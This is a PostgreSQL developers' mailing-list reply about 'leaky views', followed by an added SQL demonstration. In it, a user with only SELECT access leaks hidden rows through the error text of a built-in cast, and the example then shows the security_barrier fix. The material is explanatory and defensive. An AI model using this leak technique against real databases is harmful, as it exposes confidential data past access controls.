Re: leaky views, yet again

From: Robert Haas <robertmhaas(at)gmail(dot)com>
To: Greg Stark <gsstark(at)mit(dot)edu>
Cc: Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>, KaiGai Kohei <kaigai(at)kaigai(dot)gr(dot)jp>, KaiGai Kohei <kaigai(at)ak(dot)jp(dot)nec(dot)com>, Itagaki Takahiro <itagaki(dot)takahiro(at)gmail(dot)com>, Heikki Linnakangas <heikki(dot)linnakangas(at)enterprisedb(dot)com>, pgsql-hackers(at)postgresql(dot)org
Subject: Re: leaky views, yet again
Date: 2010-10-05 18:49:43
Message-ID: AANLkTimFyf8ekmM4sQ8tMWLn10w8SYwEo0XZ0jZAzSZC@mail.gmail.com
Lists: pgsql-hackers

On Tue, Oct 5, 2010 at 2:08 PM, Greg Stark <gsstark(at)mit(dot)edu> wrote:
> Though I find it unlikely the sales people would have direct access to
> run arbitrary SQL -- let alone create custom functions.

I have definitely seen shops where virtually everyone has SQL-level
access to the database. Several of them. Most of them were pretty
insecure, but it certainly doesn't help anything when the database has
no capability to do anything better. Now, I will grant you that not
everyone in those organizations was actually smart enough to do
meaningful things with the access they had, but I never found that
very comforting.

> If the users that have select access on the view don't have DDL access
> doesn't that make them leak-proof for those users?

Depends what they can do with pre-existing, or built-in, functions.

--
Robert Haas
EnterpriseDB: http://www.enterprisedb.com
The Enterprise Postgres Company

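The point about pre-existing functions, as an added example (this is not code from the thread or from the PostgreSQL project): a view that restricts rows through an access table, queried by a role that can only SELECT from the view and cannot create functions. The role names, table names and sample rows are constructed; the fix at the end uses the security_barrier view option that PostgreSQL added in 9.2, after this thread was written.

```sql
-- Added example (not from the thread, not PostgreSQL project code).
-- Roles, tables and rows are constructed. Run as a superuser or as a
-- role that is a member of "bob" so that SET ROLE works.

CREATE ROLE alice LOGIN;
CREATE ROLE bob   LOGIN;

-- Base table with one sensitive text column.
CREATE TABLE customer (
    id    integer PRIMARY KEY,
    name  text    NOT NULL,
    notes text    NOT NULL          -- what the view is meant to protect
);
INSERT INTO customer VALUES
    (1, 'Acme Ltd', 'renewal at risk, offered 30% discount'),
    (2, 'Globex',   'CEO is a board member''s brother'),
    (3, 'Initech',  'audit found unpaid invoices');

-- Who may see which customer. Consulted through a subquery, which the
-- planner turns into a semi-join that runs after the scan of "customer".
CREATE TABLE rep_access (rep text NOT NULL, customer_id integer NOT NULL);
INSERT INTO rep_access VALUES ('alice', 1), ('bob', 2), ('bob', 3);

-- The "secure" view: each rep sees only their own customers.
CREATE VIEW customer_v AS
    SELECT id, name, notes
      FROM customer
     WHERE id IN (SELECT customer_id FROM rep_access
                   WHERE rep = current_user);

GRANT SELECT ON customer_v TO alice, bob;   -- no rights on the base tables

-- bob has no CREATE FUNCTION privilege and no access to "customer", yet
-- a built-in cast is enough. The planner flattens the view and pushes
-- bob's WHERE clause down to the scan of "customer", where "id = 1"
-- (cheapest) and the cast are evaluated before the access check. Casting
-- the hidden row's notes to integer fails, and the error echoes the value:
--   ERROR:  invalid input syntax for type integer: "renewal at risk, offered 30% discount"
SET ROLE bob;
SELECT name FROM customer_v WHERE id = 1 AND notes::integer > 0;
RESET ROLE;
-- Whether this fires depends on the plan the optimizer picks (a nested
-- loop that probes "customer" by id from bob's access rows would never
-- evaluate the cast on row 1). That is the problem: the leak is decided
-- by cost estimates, not by privileges.

-- Fix (PostgreSQL 9.2 and later, i.e. after this thread): mark the view
-- as a security barrier. It is then not flattened, and only functions
-- marked LEAKPROOF may be pushed below its WHERE. The text-to-integer
-- cast is not leakproof precisely because its error text reveals the
-- input, so it now runs only on rows bob is allowed to see. The same
-- query returns zero rows and raises no error.
ALTER VIEW customer_v SET (security_barrier = true);
SET ROLE bob;
SELECT name FROM customer_v WHERE id = 1 AND notes::integer > 0;
RESET ROLE;
```

The attacker needs nothing beyond SELECT on the view: the oracle is the error text of a built-in I/O function, and "AND id = N" lets them walk the table one hidden row at a time.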